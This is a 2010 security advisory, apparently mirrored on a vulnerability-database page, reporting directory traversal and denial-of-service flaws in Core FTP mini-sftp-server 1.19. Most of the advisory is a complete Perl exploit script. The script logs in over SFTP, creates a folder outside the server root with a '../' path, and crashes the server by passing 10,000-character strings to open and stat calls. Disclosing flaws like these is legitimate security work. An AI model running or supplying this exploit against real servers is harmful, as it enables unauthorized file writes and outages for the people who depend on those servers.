Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:23994
HistoryJun 08, 2010 - 12:00 a.m.

Core FTP mini-sftp-server Several DoS and Directory Traversal Vulnerabilities

2010-06-0800:00:00
vulners.com
112
JSON

Date of Discovery:
7-Jun-2010

Credits:
leinakesi[at]gmail.com

Vendor:
Core FTP mini-sftp-server
http://www.coreftp.com/server/index.html

Affected:
Core FTP mini-sftp-server version 1.19.
Earlier versions may also be affected.

Overview:
"Core FTP Server" and "Core FTP mini-core sftp server" are both products of Core FTP that allow you to
exchange files with others via networks and the internet. I have tested the SFTP module of "Core FTP
Server" before and found there are several Denial of Service and Directory Traversal vulnerabilities. It
seems "Core FTP mini-core sftp server" has behaved the same way as Core FTP Server does–They have the same
vulnerabilities.

  1.  Directory Traversal vulnerability:
 $m = $sftp->mkdir("../A/");# create a folder outside the root directory

  2.  Denial of Service vulnerability:
 $o1 = $sftp->open("A" x 10000);
 $o2 = $sftp->open("test", "O_RDWR", "A" x 10000);
 $o3 = $sftp->open("test", $FUZZ, 0666); $o3 = $sftp->open("test", $FUZZ, 0666);
 $st = $sftp->stat("A" x 10000);

PS: thanks to Jeremy Brown, I learned a lot from his blog.^_^

Exploit example:

#!/usr/bin/perl
#leinakesi[at]gmail.com
#thanks to Jeremy Brown, I learned a lot from his blog.^_^
#the script will first make a folder "A" outside the root directory and then crash the server.

use Net::SSH2;
use Getopt::Std;

$FUZZ = "A" x 10000;

getopts('S:P:u:p:', \%opts);
$server = $opts{'S'}; $port = $opts{'P'}; $user = $opts{'u'}; $pass = $opts{'p'};

if(!defined($server) || !defined($port) || !defined($user) || !defined($pass) )
{
print "usage:\n\tperl test.pl -S [IP] -P [port] -u [user] -p [password]\nexample:\n";
print "\tperl test.pl -S 192.168.48.114 -P 22 -u chloe -p 111111\n";
exit(0);
}

$ssh2 = Net::SSH2->new();
$ssh2->connect($server, $port) || die "can not connect the server, please check.\n";
$ssh2->auth_password($user, $pass) || die "you sure user name and password are correct?\n";
$sftp = $ssh2->sftp();

#make a folder outside the root directory
$m = $sftp->mkdir("…/A/");

#any command of the following would cause Core FTP mini-sftp-server crash.
$o1 = $sftp->open($FUZZ);
#$o2 = $sftp->open("test", "O_RDWR", $FUZZ);
#$o3 = $sftp->open("test", $FUZZ, 0666);$o3 = $sftp->open("test", $FUZZ, 0666);
#$st = $sftp->stat($FUZZ);

$ssh2->disconnect();

JSON